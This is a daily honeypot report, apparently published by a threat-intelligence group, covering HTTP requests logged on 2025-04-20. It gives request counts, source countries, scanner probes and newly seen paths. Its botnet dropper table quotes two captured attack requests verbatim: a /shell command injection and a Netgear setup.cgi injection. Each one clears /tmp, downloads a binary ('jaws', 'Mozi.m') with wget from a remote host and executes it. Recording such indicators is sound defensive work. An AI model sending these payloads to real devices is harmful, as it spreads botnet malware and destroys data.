Skip to main content
  1. Daily-Posts/

Report: 2025-04-20

·504 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-04-20
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

executive_summary
#

In today’s repport, we detected 2 stage 1 IP address(es), linked to 2 dropper URL(s).

There are 45 new requests that have never been observed before (these were added to the monitored request database.).

A total of 1792 requests were recorded during the day, originating from 2 different countries, with a peak of 419 requests coming from GB.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
BGGermany
USGermany
SGGermany
BRGermany
USGermany
IDGermany
AU
USDubai
MDIsrael

botnet_dropper_behaviour
#

remote_addrrequest
88.244.129.179GET /shell?cd+/tmp;rm+-rf+*;wget+31.58.51.98/jaws;sh+/tmp/jaws HTTP/1.1
103.48.64.57GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://103.48.64.57:54038/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
197GET http://apiv4.9hits.com/test HTTP/1.1
822GET /teststream HTTP/1.0
832GET /index.m3u8 HTTP/1.0
912GET /index.m3u8 HTTP/1.1
922GET /10/index.m3u8 HTTP/1.1
932GET /10/index.m3u8 HTTP/1.0
942GET /teststream HTTP/1.1
962GET /playlist.m3u8 HTTP/1.1
972GET /playlist.m3u8 HTTP/1.0
982GET /status.xsl HTTP/1.0
992GET /status HTTP/1.0
1092GET /index.html HTTP/1.0
1102GET /playlist HTTP/1.1
1112GET /playlist HTTP/1.0
1132GET /stat HTTP/1.0
1142GET /status.xsl HTTP/1.1
1661\x00\x0E8E\xE5LZ\xF8\xDB\xE2\x80\x00\x00\x00\x00\x00
2031GET /Nmap/folder/check1745131706 HTTP/1.1
3531GET /rh1Q HTTP/1.1
3711GET /NmapUpperCheck1745131706 HTTP/1.1
3791GET /nmaplowercheck1745131706 HTTP/1.1
3931GET /Odin/http/call1745160606 HTTP/1.1
3941GET /OdinHttpCall1745160606 HTTP/1.1
3951GET /odinhttpcall1745160606 HTTP/1.1
3991\x00\x0E8\x0B\xB4\xCD\x80\x86\xDF\xFC\xBE\x00\x00\x00\x00\x00
4041GET /files/ HTTP/1.1
4051GET /home/ HTTP/1.1
4121GET /uploads/ HTTP/1.1
4231\x04\x01\x01\xBB@\xE9\xA1gadm:12345\x00
4241\x04\x01\x01\xBB@\xE9\xA1g\x00
4281\x00\x0E8\xC6C\x8D&\xE81\x87Q\x00\x00\x00\x00\x00
4401\x00\x0E8\xDEWz\x81`\x8C\xB3\x99\x00\x00\x00\x00\x00
4431GET /upload/ HTTP/1.1
4681POST /api/user/binLookup?time=1745160677024625528 HTTP/1.1
4691GET /api/bin/440393?time=1745160676540185291 HTTP/1.1
4741GET /config/index?time=1745159449093169966 HTTP/1.1
4891\x00\x0E8\x91 \xF0k,Z\x00\xE5\x00\x00\x00\x00\x00
4941POST /api/user/binLookup?time=1745159454820008862 HTTP/1.1
4951GET /api/bin/440393?time=1745159454413517897 HTTP/1.1
4961GET /config/index?time=1745158712882807311 HTTP/1.1
5121GET /Odin/http/call1745140200 HTTP/1.1
5131GET /OdinHttpCall1745140200 HTTP/1.1
5141GET /odinhttpcall1745140200 HTTP/1.1
5161GET /j6Kq HTTP/1.1
5181\x00\x0E8h7\xEC\xAA\xD30\xB2\xF1\x00\x00\x00\x00\x00

country_iso_code
#

number_of_occurencecountry_iso_code
0419GB
1312US
2215AU
3171SC
4116DE
589PL
662RU
759NL
851SG
940MD
1035LT
1129FR
1229UA
1326CN
1416IL
1513BG
1612KR
1711AO
1810JP
199IN
208VN
218CA
228TR
237BE
246GH
255ZA
264MC
274BR
284ID
293HK
302PT
312IT
321TW
331IR
341PA
351HU
361IE
371CL
381KE

Related

Report: 2025-04-19
·395 words
Repport Daily
Report: 2025-04-18
·482 words
Repport Daily
Report: 2025-04-17
·410 words
Repport Daily